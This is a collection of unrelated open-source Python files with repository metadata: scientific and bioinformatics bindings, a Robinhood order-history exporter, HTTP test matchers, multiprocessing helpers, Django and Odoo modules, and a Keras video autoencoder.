conradsConstraint = ({'type': 'eq',
'fun': lambda x: np.sum(x) - 7},)
result = conrad.optimize(constraints=conradsConstraint)
print result
#results are numerically quite imprecise. In the above example, in principle the consumption of
#goods 2 and 3 should differ only by .3
|
bsd-3-clause
| 151,333,219,942,449,920
| 37.914729
| 146
| 0.608316
| false
| 4.154157
| false
| false
| false
|
otraczyk/gsevol-web
|
bindings/urec.py
|
1
|
1651
|
# -*- coding: utf-8 -*-
"""Bindings related to unrooted recocilation.
Using `fasturec` and `gsevol`.
"""
import tempfile
from collections import defaultdict
from bindings.base import launch
from bindings import gsevol as Gse
from bindings.utils import wrap_in_tempfile
def launch_fasturec(params, timeout=300, stdin=None, *args, **kwargs):
return launch(['lib/fasturec/fasturec'], params, timeout, stdin, *args, **kwargs)
def launch_urec(params, timeout=300, stdin=None, *args, **kwargs):
return launch(['lib/urec/urec'], params, timeout, stdin, *args, **kwargs)
def draw_unrooted(gene, species, cost, options=''):
assert cost in ("DL", "D", "L", "DC", "RF"), "Wrong cost function: %s" % cost
fu_command = ['-g %s' % gene, '-s %s' % species, '-bX%s' % cost]
fu_output = launch_fasturec(fu_command)
fu_out_file = wrap_in_tempfile(fu_output)
# Fasturec and gsevol outputs interfere and damage the picture if it's
# printed to stdout.
tmp = tempfile.NamedTemporaryFile()
gse_command = ['-dSz', '-C arrowlength=0.4;scale=2;outputfile="%s"; %s' % (tmp.name, options)]
Gse.launch(gse_command, stdin=fu_out_file)
gse_output = tmp.read()
return gse_output
def optimal_rootings(gene, species, cost):
"""Generate a list of representations of optimal rootings of a gene tree
for given cost function (default=...?).
"""
cost_to_opt = defaultdict(lambda: "a5", {
"DL": "a8",
})
command = ['-g %s' % gene, '-s %s' % species, '-b', '-%s' % cost_to_opt[cost]]
output = launch_urec(command)
rootings = [r.strip() for r in output.strip().split('\n')]
return rootings
|
mit
| -6,543,209,536,789,756,000
| 38.309524
| 98
| 0.651726
| false
| 3.126894
| false
| false
| false
|
codesociety/friartuck
|
friartuck/Robinhood/trade_history_downloader.py
|
1
|
2942
|
"""
MIT License
Copyright (c) 2017 Code Society
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import json
import csv
import shelve
from Robinhood import Robinhood
def get_symbol_from_instrument_url(rb_client, url, db):
instrument = {}
if url in db:
instrument = db[url]
else:
db[url] = fetch_json_by_url(rb_client, url)
instrument = db[url]
return instrument['symbol']
def fetch_json_by_url(rb_client, url):
return rb_client.session.get(url).json()
def order_item_info(order, rb_client, db):
#side: .side, price: .average_price, shares: .cumulative_quantity, instrument: .instrument, date : .last_transaction_at
symbol = get_symbol_from_instrument_url(rb_client, order['instrument'], db)
return {
'side': order['side'],
'price': order['average_price'],
'shares': order['cumulative_quantity'],
'symbol': symbol,
'date': order['last_transaction_at'],
'state': order['state']
}
def get_all_history_orders(rb_client):
orders = []
past_orders = rb.order_history()
orders.extend(past_orders['results'])
while past_orders['next']:
print("{} order fetched".format(len(orders)))
next_url = past_orders['next']
past_orders = fetch_json_by_url(rb_client, next_url)
orders.extend(past_orders['results'])
print("{} order fetched".format(len(orders)))
return orders
rb = Robinhood()
# !!!!!! change the username and passs, be careful when paste the code to public
rb.login(username="name", password="pass")
past_orders = get_all_history_orders(rb)
instruments_db = shelve.open('instruments.db')
orders = [order_item_info(order, rb, instruments_db) for order in past_orders]
keys = ['side', 'symbol', 'shares', 'price', 'date', 'state']
with open('orders.csv', 'w') as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(orders)
|
mit
| -2,211,343,214,784,098,300
| 35.320988
| 124
| 0.704623
| false
| 3.757344
| false
| false
| false
|
kevinjqiu/mockingjay
|
mockingjay/matcher.py
|
1
|
2117
|
import abc
import base64
import re
class StringOrPattern(object):
"""
A decorator object that wraps a string or a regex pattern so that it can
be compared against another string either literally or using the pattern.
"""
def __init__(self, subject):
self.subject = subject
def __eq__(self, other_str):
if isinstance(self.subject, re._pattern_type):
return self.subject.search(other_str) is not None
else:
return self.subject == other_str
def __hash__(self):
return self.subject.__hash__()
class Matcher(object):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def assert_request_matched(self, request):
"""
Assert that the request matched the spec in this matcher object.
"""
class HeaderMatcher(Matcher):
"""
Matcher for the request's header.
:param key: the name of the header
:param value: the value of the header
"""
def __init__(self, key, value):
self.key = key
self.value = StringOrPattern(value)
def assert_request_matched(self, request):
assert request.headers.get(self.key) == self.value
class ContentTypeMatcher(HeaderMatcher):
"""
Matcher for the request's content type
"""
def __init__(self, content_type):
super(ContentTypeMatcher, self).__init__('content-type', content_type)
class BasicAuthUserMatcher(HeaderMatcher):
"""
Matcher for the request's basic auth user
"""
def __init__(self, user, password):
value = "%s:%s" % (user, '' if not password else password)
self.key = 'authorization'
# expect an exact match
# therefore, not wrapping it in StringOrPattern
self.value = 'Basic %s' % base64.b64encode(value)
class BodyMatcher(Matcher):
"""
Matcher for the request body.
:param body: can either be a string or a :class:`_sre.SRE_Pattern`: object
"""
def __init__(self, body):
self.body = StringOrPattern(body)
def assert_request_matched(self, request):
assert request.body == self.body
|
bsd-3-clause
| 7,529,588,538,709,815,000
| 25.4625
| 78
| 0.629192
| false
| 4.094778
| false
| false
| false
|
dougalsutherland/py-sdm
|
sdm/mp_utils.py
|
1
|
5214
|
'''
Some convenince methods for use with multiprocessing.Pool.
'''
from __future__ import division, print_function
from contextlib import contextmanager
import itertools
import multiprocessing as mp
import os
import random
import string
from .utils import strict_map, imap, izip
def _apply(func_args):
func, args = func_args
return func(*args)
### Dummy implementation of (some of) multiprocessing.Pool that doesn't even
### thread (unlike multiprocessing.dummy).
class ImmediateResult(object):
"Duck-type like multiprocessing.pool.MapResult."
def __init__(self, value):
self.value = value
def get(self, timeout=None):
return self.value
def wait(self, timeout=None):
pass
def ready(self):
return True
def successful(self):
return True
class DummyPool(object):
"Duck-type like multiprocessing.Pool, mostly."
def close(self):
pass
def join(self):
pass
def apply_async(self, func, args, kwds=None, callback=None):
val = func(*args, **(kwds or {}))
callback(val)
return ImmediateResult(val)
def map(self, func, args, chunksize=None):
return strict_map(func, args)
def imap(self, func, args, chunksize=None):
return imap(func, args)
def imap_unordered(self, func, args, chunksize=None):
return imap(func, args)
def patch_starmap(pool):
'''
A function that adds the equivalent of multiprocessing.Pool.starmap
to a given pool if it doesn't have the function.
'''
if hasattr(pool, 'starmap'):
return
def starmap(func, iterables):
return pool.map(_apply, izip(itertools.repeat(func), iterables))
pool.starmap = starmap
def make_pool(n_proc=None):
"Makes a multiprocessing.Pool or a DummyPool depending on n_proc."
pool = DummyPool() if n_proc == 1 else mp.Pool(n_proc)
patch_starmap(pool)
return pool
@contextmanager
def get_pool(n_proc=None):
"A context manager that opens a pool and joins it on exit."
pool = make_pool(n_proc)
yield pool
pool.close()
pool.join()
### A helper for letting the forked processes use data without pickling.
_data_name_cands = (
'_data_' + ''.join(random.sample(string.ascii_lowercase, 10))
for _ in itertools.count())
class ForkedData(object):
'''
Class used to pass data to child processes in multiprocessing without
really pickling/unpickling it. Only works on POSIX.
Intended use:
- The master process makes the data somehow, and does e.g.
data = ForkedData(the_value)
- The master makes sure to keep a reference to the ForkedData object
until the children are all done with it, since the global reference
is deleted to avoid memory leaks when the ForkedData object dies.
- Master process constructs a multiprocessing.Pool *after*
the ForkedData construction, so that the forked processes
inherit the new global.
- Master calls e.g. pool.map with data as an argument.
- Child gets the real value through data.value, and uses it read-only.
Modifying it won't crash, but changes won't be propagated back to the
master or to other processes, since it's copy-on-write.
'''
# TODO: more flexible garbage collection options
def __init__(self, val):
g = globals()
self.name = next(n for n in _data_name_cands if n not in g)
g[self.name] = val
self.master_pid = os.getpid()
def __getstate__(self):
if os.name != 'posix':
raise RuntimeError("ForkedData only works on OSes with fork()")
return self.__dict__
@property
def value(self):
return globals()[self.name]
def __del__(self):
if os.getpid() == self.master_pid:
del globals()[self.name]
### Progress-bar handling with multiprocessing pools
def progress(counter=True, **kwargs):
import progressbar as pb
try:
widgets = kwargs.pop('widgets')
except KeyError:
# TODO: make work when maxval is unknown
if counter:
class CommaProgress(pb.Widget):
def update(self, pbar):
return '{:,} of {:,}'.format(pbar.currval, pbar.maxval)
widgets = [' ', CommaProgress(), ' (', pb.Percentage(), ') ']
else:
widgets = [' ', pb.Percentage(), ' ']
widgets.extend([pb.Bar(), ' ', pb.ETA()])
return pb.ProgressBar(widgets=widgets, **kwargs)
def progressbar_and_updater(*args, **kwargs):
pbar = progress(*args, **kwargs).start()
counter = itertools.count(1)
def update_pbar():
pbar.update(next(counter))
# race conditions mean the pbar might be updated backwards on
# occasion, but the highest count ever seen will be right.
return pbar, update_pbar
def map_unordered_with_progressbar(pool, func, jobs):
pbar, tick_pbar = progressbar_and_updater(maxval=len(jobs))
callback = lambda result: tick_pbar()
results = [pool.apply_async(func, job, callback=callback) for job in jobs]
values = [r.get() for r in results]
pbar.finish()
return values
|
bsd-3-clause
| 6,525,598,132,934,458,000
| 29.138728
| 79
| 0.641158
| false
| 3.929164
| false
| false
| false
|
DjangoQuilla/temii
|
votos/urls.py
|
2
|
1862
|
"""votos URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.auth.views import logout
from apps.votos.views import (
ListarEstadoView, ListarAgendadoView, ListarFinalizadoView,
RegistrarCharlaView, DetalleCharlaView, ListarFaqView
)
from apps.votos.views import VotoView, login
urlpatterns = [
url(r'^$', ListarEstadoView.as_view(), name='index'),
url(r'^agendado$', ListarAgendadoView.as_view(), name='agendado'),
url(r'^finalizado$', ListarFinalizadoView.as_view(), name='finalizado'),
url(r'^faq$', ListarFaqView.as_view(), name='faq'),
url(r'^admin/', include(admin.site.urls)),
url(r'^registrar_charla$',
RegistrarCharlaView.as_view(),
name='registrar_charla'),
url(r'^votar/(?P<charla>\d+)$', VotoView.as_view(), name='votar'),
url(r'^posible-charla/(?P<pk>\d+)$',
DetalleCharlaView.as_view(),
name='detalle_charla'),
# Python Social Auth URLs
# url('', include('social.apps.django_app.urls', namespace='social')),
url(r'^oauth/', include('social_django.urls', namespace='social')),
url(r'^login', login, name="login"),
url(r'^users/logout/$', logout,
{'next_page': '/'},
name="user-logout"),
]
|
apache-2.0
| 9,124,189,688,081,066,000
| 37
| 77
| 0.668099
| false
| 3.210345
| false
| false
| false
|
shingonoide/odoo_ezdoo
|
addons/website_maintenance/controllers/main.py
|
1
|
2661
|
import logging
from openerp.http import request
import werkzeug
from openerp.addons.web import http
from openerp.addons.website.controllers.main import Website
logger = logging.getLogger(__name__)
class WebsiteMaintenance(Website):
def is_maintenance_mode(self):
is_on = ['on', '1', 'true', 'yes']
maintenance_mode = request.registry['ir.config_parameter'].get_param(
request.cr, request.uid, 'website.maintenance_mode')
logger.debug("maintenance_mode value: %s" % (maintenance_mode))
if maintenance_mode in is_on:
logger.info("Maintenance mode on")
if not request.uid:
logger.info("Not uid, request auth public")
self._auth_method_public()
ir_model = request.env['ir.model.data'].sudo()
allowed_group = ir_model.get_object('base',
'group_website_designer')
if allowed_group in request.env.user.groups_id:
logger.info("Maintenance mode off for user_id: %s" %
(request.env.user.id))
return
code = 503
status_message = request.registry['ir.config_parameter'].get_param(
request.cr, request.uid, 'website.maintenance_message',
"We're maintenance now")
values = {
'status_message': status_message,
'status_code': code,
'company_email': request.env.user.company_id.email
}
logger.debug(values)
try:
html = request.website._render('website_maintenance.%s' %
code, values)
except Exception:
html = request.website._render('website.http_error', values)
return werkzeug.wrappers.Response(html, status=code,
content_type=
'text/html;charset=utf-8')
@http.route('/', type='http', auth="public", website=True)
def index(self, **kw):
is_maintenance_mode = self.is_maintenance_mode()
if not is_maintenance_mode:
return super(WebsiteMaintenance, self).index()
else:
return is_maintenance_mode
@http.route('/page/<page:page>', type='http', auth="public", website=True)
def page(self, page, **opts):
is_maintenance_mode = self.is_maintenance_mode()
if not is_maintenance_mode:
return super(WebsiteMaintenance, self).page(page)
else:
return is_maintenance_mode
|
agpl-3.0
| -3,009,250,158,980,615,000
| 38.716418
| 79
| 0.550169
| false
| 4.435
| false
| false
| false
|
Belxjander/Kirito
|
SnowStorm/indra/fix-incredibuild.py
|
1
|
2220
|
#!/usr/bin/env python
##
## $LicenseInfo:firstyear=2011&license=viewerlgpl$
## Second Life Viewer Source Code
## Copyright (C) 2011, Linden Research, Inc.
##
## This library is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public
## License as published by the Free Software Foundation;
## version 2.1 of the License only.
##
## This library is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public
## License along with this library; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
##
## Linden Research, Inc., 945 Battery Street, San Francisco, CA 94111 USA
## $/LicenseInfo$
import sys
import os
import glob
def delete_file_types(path, filetypes):
if os.path.exists(path):
print 'Cleaning: ' + path
orig_dir = os.getcwd();
os.chdir(path)
filelist = []
for type in filetypes:
filelist.extend(glob.glob(type))
for file in filelist:
os.remove(file)
os.chdir(orig_dir)
def main():
build_types = ['*.exp','*.exe','*.pdb','*.idb',
'*.ilk','*.lib','*.obj','*.ib_pdb_index']
pch_types = ['*.pch']
delete_file_types("build-vc80/newview/Release", build_types)
delete_file_types("build-vc80/newview/secondlife-bin.dir/Release/",
pch_types)
delete_file_types("build-vc80/newview/RelWithDebInfo", build_types)
delete_file_types("build-vc80/newview/secondlife-bin.dir/RelWithDebInfo/",
pch_types)
delete_file_types("build-vc80/newview/Debug", build_types)
delete_file_types("build-vc80/newview/secondlife-bin.dir/Debug/",
pch_types)
delete_file_types("build-vc80/test/RelWithDebInfo", build_types)
delete_file_types("build-vc80/test/test.dir/RelWithDebInfo/",
pch_types)
if __name__ == "__main__":
main()
|
gpl-3.0
| 4,947,040,908,959,312,000
| 35.393443
| 81
| 0.651351
| false
| 3.529412
| false
| false
| false
|
pratikgujjar/DeepIntent
|
code/autoencoder_model/scripts/ds_autoencoder.py
|
1
|
15225
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hickle as hkl
import numpy as np
np.random.seed(2 ** 10)
from keras import backend as K
K.set_image_dim_ordering('tf')
from keras.layers import Dropout
from keras.models import Sequential
from keras.layers.core import Activation
from keras.utils.vis_utils import plot_model
from keras.layers.wrappers import TimeDistributed
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import Conv2DTranspose
from keras.layers.convolutional import Conv3D
from keras.layers.convolutional import Conv3DTranspose
from keras.layers.convolutional_recurrent import ConvLSTM2D
from keras.layers.normalization import BatchNormalization
from keras.layers.core import Reshape
from keras.callbacks import LearningRateScheduler
from keras.layers.advanced_activations import LeakyReLU
from config_ds import *
import tb_callback
import lrs_callback
import argparse
import math
import os
import cv2
from sys import stdout
def encoder_model():
model = Sequential()
# 10x64x64
model.add(Conv3D(filters=256,
strides=(1, 2, 2),
kernel_size=(3, 11, 11),
padding='same',
input_shape=(int(VIDEO_LENGTH/2), 64, 64, 1)))
model.add(TimeDistributed(BatchNormalization()))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
# 10x32x32
# model.add(Conv3D(filters=128,
# strides=(1, 2, 2),
# kernel_size=(3, 5, 5),
# padding='same'))
# model.add(TimeDistributed(BatchNormalization()))
# model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
# model.add(TimeDistributed(Dropout(0.5)))
# 10x32x32
model.add(Conv3D(filters=128,
strides=(1, 2, 2),
kernel_size=(3, 5, 5),
padding='same'))
model.add(TimeDistributed(BatchNormalization()))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
return model
def decoder_model():
model = Sequential()
# 10x32x32
model.add(Conv3DTranspose(filters=64,
kernel_size=(3, 5, 5),
padding='same',
strides=(1, 1, 1),
input_shape=(10, 16, 16, 128)))
model.add(TimeDistributed(BatchNormalization()))
# model.add(TimeDistributed(Activation('relu')))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
# 10x64x64
model.add(Conv3DTranspose(filters=128,
kernel_size=(3, 5, 5),
padding='same',
strides=(1, 2, 2)))
model.add(TimeDistributed(BatchNormalization()))
# model.add(TimeDistributed(Activation('relu')))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
# 10x64x64
model.add(Conv3DTranspose(filters=64,
kernel_size=(3, 5, 5),
padding='same',
strides=(1, 2, 2)))
model.add(TimeDistributed(BatchNormalization()))
# model.add(TimeDistributed(Activation('relu')))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
# 10x128x128
model.add(Conv3DTranspose(filters=1,
kernel_size=(3, 5, 5),
strides=(1, 1, 1),
padding='same'))
model.add(TimeDistributed(BatchNormalization()))
model.add(TimeDistributed(Activation('tanh')))
model.add(TimeDistributed(Dropout(0.5)))
return model
def set_trainability(model, trainable):
model.trainable = trainable
for layer in model.layers:
layer.trainable = trainable
def autoencoder_model(encoder, decoder):
model = Sequential()
model.add(encoder)
model.add(decoder)
return model
def combine_images(X, y, generated_images):
# Unroll all generated video frames
n_frames = generated_images.shape[0] * generated_images.shape[1]
frames = np.zeros((n_frames,) + generated_images.shape[2:], dtype=generated_images.dtype)
frame_index = 0
for i in range(generated_images.shape[0]):
for j in range(generated_images.shape[1]):
frames[frame_index] = generated_images[i, j]
frame_index += 1
num = frames.shape[0]
width = int(math.sqrt(num))
height = int(math.ceil(float(num) / width))
shape = frames.shape[1:]
image = np.zeros((height * shape[0], width * shape[1], shape[2]), dtype=generated_images.dtype)
for index, img in enumerate(frames):
i = int(index / width)
j = index % width
image[i * shape[0]:(i + 1) * shape[0], j * shape[1]:(j + 1) * shape[1], :] = img
n_frames = X.shape[0] * X.shape[1]
orig_frames = np.zeros((n_frames,) + X.shape[2:], dtype=X.dtype)
# Original frames
frame_index = 0
for i in range(X.shape[0]):
for j in range(X.shape[1]):
orig_frames[frame_index] = X[i, j]
frame_index += 1
num = orig_frames.shape[0]
width = int(math.sqrt(num))
height = int(math.ceil(float(num) / width))
shape = orig_frames.shape[1:]
orig_image = np.zeros((height * shape[0], width * shape[1], shape[2]), dtype=X.dtype)
for index, img in enumerate(orig_frames):
i = int(index / width)
j = index % width
orig_image[i * shape[0]:(i + 1) * shape[0], j * shape[1]:(j + 1) * shape[1], :] = img
# Ground truth
truth_frames = np.zeros((n_frames,) + y.shape[2:], dtype=y.dtype)
frame_index = 0
for i in range(y.shape[0]):
for j in range(y.shape[1]):
truth_frames[frame_index] = y[i, j]
frame_index += 1
num = truth_frames.shape[0]
width = int(math.sqrt(num))
height = int(math.ceil(float(num) / width))
shape = truth_frames.shape[1:]
truth_image = np.zeros((height * shape[0], width * shape[1], shape[2]), dtype=y.dtype)
for index, img in enumerate(truth_frames):
i = int(index / width)
j = index % width
truth_image[i * shape[0]:(i + 1) * shape[0], j * shape[1]:(j + 1) * shape[1], :] = img
return orig_image, truth_image, image
def load_weights(weights_file, model):
model.load_weights(weights_file)
def run_utilities(encoder, decoder, autoencoder, ENC_WEIGHTS, DEC_WEIGHTS):
if PRINT_MODEL_SUMMARY:
print (encoder.summary())
print (decoder.summary())
print (autoencoder.summary())
# exit(0)
# Save model to file
if SAVE_MODEL:
print ("Saving models to file...")
model_json = encoder.to_json()
with open(os.path.join(MODEL_DIR, "encoder.json"), "w") as json_file:
json_file.write(model_json)
model_json = decoder.to_json()
with open(os.path.join(MODEL_DIR, "decoder.json"), "w") as json_file:
json_file.write(model_json)
model_json = autoencoder.to_json()
with open(os.path.join(MODEL_DIR, "autoencoder.json"), "w") as json_file:
json_file.write(model_json)
if PLOT_MODEL:
plot_model(encoder, to_file=os.path.join(MODEL_DIR, 'encoder.png'), show_shapes=True)
plot_model(decoder, to_file=os.path.join(MODEL_DIR, 'decoder.png'), show_shapes=True)
plot_model(autoencoder, to_file=os.path.join(MODEL_DIR, 'autoencoder.png'), show_shapes=True)
if ENC_WEIGHTS != "None":
print ("Pre-loading encoder with weights...")
load_weights(ENC_WEIGHTS, encoder)
if DEC_WEIGHTS != "None":
print ("Pre-loading decoder with weights...")
load_weights(DEC_WEIGHTS, decoder)
def load_X(videos_list, index, data_dir):
X = np.zeros((BATCH_SIZE, VIDEO_LENGTH,) + IMG_SIZE)
for i in range(BATCH_SIZE):
for j in range(VIDEO_LENGTH):
filename = "frame_" + str(videos_list[(index*BATCH_SIZE + i), j]) + ".png"
im_file = os.path.join(data_dir, filename)
try:
frame = cv2.imread(im_file, cv2.IMREAD_COLOR)
X[i, j] = (frame.astype(np.float32) - 127.5) / 127.5
except AttributeError as e:
print (im_file)
print (e)
return X
def train(BATCH_SIZE, ENC_WEIGHTS, DEC_WEIGHTS):
print ("Loading data...")
mnist = np.load(os.path.join(DATA_DIR, 'mnist_test_seq.npy'))
mnist = np.expand_dims(mnist, axis=4)
# Build the Spatio-temporal Autoencoder
print ("Creating models...")
encoder = encoder_model()
decoder = decoder_model()
autoencoder = autoencoder_model(encoder, decoder)
run_utilities(encoder, decoder, autoencoder, ENC_WEIGHTS, DEC_WEIGHTS)
autoencoder.compile(loss='mean_squared_error', optimizer=OPTIM)
NB_ITERATIONS = int(mnist.shape[1]/BATCH_SIZE)
# Setup TensorBoard Callback
TC = tb_callback.TensorBoard(log_dir=TF_LOG_DIR, histogram_freq=0, write_graph=False, write_images=False)
# LRS = lrs_callback.LearningRateScheduler(schedule=schedule)
# LRS.set_model(autoencoder)
print ("Beginning Training...")
# Begin Training
for epoch in range(NB_EPOCHS):
print("\n\nEpoch ", epoch)
loss = []
# Set learning rate every epoch
# LRS.on_epoch_begin(epoch=epoch)
lr = K.get_value(autoencoder.optimizer.lr)
print ("Learning rate: " + str(lr))
for index in range(NB_ITERATIONS):
# Train Autoencoder
X_train = np.zeros(shape=(10, 10, 64, 64, 1))
y_train = np.zeros(shape=(10, 10, 64, 64, 1))
for i in range(BATCH_SIZE):
X_train[i] = mnist[0 : int(VIDEO_LENGTH/2), index+i]
y_train[i] = mnist[int(VIDEO_LENGTH/2), index+i]
X_train = (X_train.astype(np.float32) - 127.5) / 127.5
y_train = (y_train.astype(np.float32) - 127.5) / 127.5
loss.append(autoencoder.train_on_batch(X_train, y_train))
arrow = int(index / (NB_ITERATIONS / 40))
stdout.write("\rIteration: " + str(index) + "/" + str(NB_ITERATIONS-1) + " " +
"loss: " + str(loss[len(loss)-1]) +
"\t [" + "{0}>".format("="*(arrow)))
stdout.flush()
if SAVE_GENERATED_IMAGES:
# Save generated images to file
predicted_images = autoencoder.predict(X_train, verbose=0)
orig_image, truth_image, pred_image = combine_images(X_train, y_train, predicted_images)
pred_image = pred_image * 127.5 + 127.5
orig_image = orig_image * 127.5 + 127.5
truth_image = truth_image * 127.5 + 127.5
if epoch == 0 :
cv2.imwrite(os.path.join(GEN_IMAGES_DIR, str(epoch) + "_" + str(index) + "_orig.png"), orig_image)
cv2.imwrite(os.path.join(GEN_IMAGES_DIR, str(epoch) + "_" + str(index) + "_truth.png"), truth_image)
cv2.imwrite(os.path.join(GEN_IMAGES_DIR, str(epoch) + "_" + str(index) + ".png"), pred_image)
# then after each epoch/iteration
avg_loss = sum(loss)/len(loss)
logs = {'loss': avg_loss}
TC.on_epoch_end(epoch, logs)
# Log the losses
with open(os.path.join(LOG_DIR, 'losses.json'), 'a') as log_file:
log_file.write("{\"epoch\":%d, \"d_loss\":%f};\n" % (epoch, avg_loss))
print("\nAvg loss: " + str(avg_loss))
# Save model weights per epoch to file
encoder.save_weights(os.path.join(CHECKPOINT_DIR, 'encoder_epoch_'+str(epoch)+'.h5'), True)
decoder.save_weights(os.path.join(CHECKPOINT_DIR, 'decoder_epoch_' + str(epoch) + '.h5'), True)
# End TensorBoard Callback
TC.on_train_end('_')
def test(ENC_WEIGHTS, DEC_WEIGHTS):
# Create models
print ("Creating models...")
encoder = encoder_model()
decoder = decoder_model()
autoencoder = autoencoder_model(encoder, decoder)
run_utilities(encoder, decoder, autoencoder, ENC_WEIGHTS, DEC_WEIGHTS)
autoencoder.compile(loss='mean_squared_error', optimizer=OPTIM)
# Build video progressions
frames_source = hkl.load(os.path.join(TEST_DATA_DIR, 'sources_test_128.hkl'))
videos_list = []
start_frame_index = 1
end_frame_index = VIDEO_LENGTH + 1
while (end_frame_index <= len(frames_source)):
frame_list = frames_source[start_frame_index:end_frame_index]
if (len(set(frame_list)) == 1):
videos_list.append(range(start_frame_index, end_frame_index))
start_frame_index = start_frame_index + VIDEO_LENGTH
end_frame_index = end_frame_index + VIDEO_LENGTH
else:
start_frame_index = end_frame_index - 1
end_frame_index = start_frame_index + VIDEO_LENGTH
videos_list = np.asarray(videos_list, dtype=np.int32)
n_videos = videos_list.shape[0]
# Test model by making predictions
loss = []
NB_ITERATIONS = int(n_videos / BATCH_SIZE)
for index in range(NB_ITERATIONS):
# Test Autoencoder
X = load_X(videos_list, index, TEST_DATA_DIR)
X_test = X[:, 0: int(VIDEO_LENGTH / 2)]
y_test = X[:, int(VIDEO_LENGTH / 2):]
loss.append(autoencoder.test_on_batch(X_test, y_test))
y_pred = autoencoder.predict_on_batch(X_test)
arrow = int(index / (NB_ITERATIONS / 40))
stdout.write("\rIteration: " + str(index) + "/" + str(NB_ITERATIONS - 1) + " " +
"loss: " + str(loss[len(loss) - 1]) +
"\t [" + "{0}>".format("=" * (arrow)))
stdout.flush()
orig_image, truth_image, pred_image = combine_images(X_test, y_test, y_pred)
pred_image = pred_image * 127.5 + 127.5
orig_image = orig_image * 127.5 + 127.5
truth_image = truth_image * 127.5 + 127.5
cv2.imwrite(os.path.join(TEST_RESULTS_DIR, str(index) + "_orig.png"), orig_image)
cv2.imwrite(os.path.join(TEST_RESULTS_DIR, str(index) + "_truth.png"), truth_image)
cv2.imwrite(os.path.join(TEST_RESULTS_DIR, str(index) + "_pred.png"), pred_image)
avg_loss = sum(loss) / len(loss)
print("\nAvg loss: " + str(avg_loss))
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("--mode", type=str)
parser.add_argument("--enc_weights", type=str, default="None")
parser.add_argument("--dec_weights", type=str, default="None")
parser.add_argument("--batch_size", type=int, default=BATCH_SIZE)
parser.add_argument("--nice", dest="nice", action="store_true")
parser.set_defaults(nice=False)
args = parser.parse_args()
return args
if __name__ == "__main__":
args = get_args()
if args.mode == "train":
train(BATCH_SIZE=args.batch_size,
ENC_WEIGHTS=args.enc_weights,
DEC_WEIGHTS=args.dec_weights)
if args.mode == "test":
test(ENC_WEIGHTS=args.enc_weights,
DEC_WEIGHTS=args.dec_weights)
|
mit
| 2,274,764,787,847,387,000
| 36.227384
| 116
| 0.59711
| false
| 3.393136
| true
| false
| false
|
OCA/l10n-brazil
|
l10n_br_nfe/models/res_company.py
|
1
|
3081
|
# Copyright 2019 Akretion (Raphaël Valyi <raphael.valyi@akretion.com>)
# Copyright 2019 KMEE INFORMATICA LTDA
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from odoo import api, fields
from odoo.addons.spec_driven_model.models import spec_models
from ..constants.nfe import (
NFE_ENVIRONMENT_DEFAULT,
NFE_ENVIRONMENTS,
NFE_VERSION_DEFAULT,
NFE_VERSIONS,
)
PROCESSADOR_ERPBRASIL_EDOC = "oca"
PROCESSADOR = [(PROCESSADOR_ERPBRASIL_EDOC, "erpbrasil.edoc")]
class ResCompany(spec_models.SpecModel):
_name = "res.company"
_inherit = ["res.company", "nfe.40.emit"]
_nfe_search_keys = ["nfe40_CNPJ", "nfe40_xNome", "nfe40_xFant"]
def _compute_nfe_data(self):
# compute because a simple related field makes the match_record fail
for rec in self:
if rec.partner_id.is_company:
rec.nfe40_choice6 = "nfe40_CNPJ"
rec.nfe40_CNPJ = rec.partner_id.cnpj_cpf
else:
rec.nfe40_choice6 = "nfe40_CPF"
rec.nfe40_CPF = rec.partner_id.cnpj_cpf
nfe40_CNPJ = fields.Char(compute="_compute_nfe_data")
nfe40_xNome = fields.Char(related="partner_id.legal_name")
nfe40_xFant = fields.Char(related="partner_id.name")
nfe40_IE = fields.Char(related="partner_id.inscr_est")
